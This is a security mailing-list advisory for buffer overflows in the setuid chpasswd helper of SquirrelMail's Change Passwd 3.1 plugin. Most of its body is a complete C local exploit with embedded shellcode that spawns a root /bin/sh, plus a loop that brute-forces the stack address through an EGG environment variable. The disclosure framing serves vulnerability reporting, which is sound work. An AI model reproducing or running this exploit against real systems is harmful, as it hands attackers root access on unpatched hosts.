[EXPL] SquirrelMail Change Passwd Plugins Multiple Buffer Overflows (Exploit)



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com



SquirrelMail Change Passwd Plugins Multiple Buffer Overflows (Exploit)
------------------------------------------------------------------------


SUMMARY

"SquirrelMail is a standards-based webmail package written in PHP4."
(http://www.squirrelmail.org/)

"Change Passwd plugins allow your users to change his/her system password
in /etc/passwd or /etc/shadow."
(http://www.squirrelmail.org/plugin_view.php?id=117)

Improper length validation of variables allows attackers to execute
arbitrary code via buffer overflows in SquirrelMail's Change Passwd
plugin (the setuid chpasswd helper it ships).

DETAILS

Vulnerable Systems:
* Change passwd version 3.1

Immune Systems:
* Change passwd version 4.0

Exploit:
/* Local Exploit
 * Multiple buffer overflows are present in the handling of command line
 * arguments in chpasswd. The bug allows a hacker to exploit the process
 * to run arbitrary code. */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memcpy */

const char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x31\xc0\xb0\x17\x31\xdb\xcd\x80"
    "\x89\xe5\x31\xc0\x50\x55\x89\xe5"
    "\x50\x68\x6e\x2f\x73\x68\x68\x2f"
    "\x2f\x62\x69\x89\xe3\x89\xe9\x89"
    "\xea\xb0\x0b\xcd\x80";

/* Returns the current stack pointer; relies on 32-bit x86 GCC returning
 * whatever was left in %eax. */
long get_sp() {
    __asm__("movl %esp,%eax;");
}

int main() {
    char buffer[1024];
    long stack = get_sp();
    int result = 1;
    long offset = 0;
    printf("[!] Change_passwd v3.1(SquirrelMail plugin) exploit\n");
    printf("[+] Current stack [0x%lx]\n", stack);
    /* Brute-force the stack address guess; the payload is passed to the
     * helper through the EGG environment variable on each attempt. */
    while (offset <= 268435456) {
        offset = offset + 1;
        stack = get_sp() + offset;
        memcpy(buffer, "EGG=", 4);
        int a = 4;
        while (a <= 108) {        /* filler up to the saved return address */
            memcpy(&buffer[a], "x", 1);
            a = a + 1;
        }
        memcpy(&buffer[108], &stack, 4);                  /* guessed address */
        memcpy(&buffer[112], shellcode, sizeof(shellcode)); /* payload */
        putenv(buffer);
        result = system("./chpasswd $EGG");
        if (result == 0) { exit(0); }
    }
}

/*EoF*/


ADDITIONAL INFORMATION

The information has been provided by rod hedor (rodhedor@xxxxxxxxxxx).



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


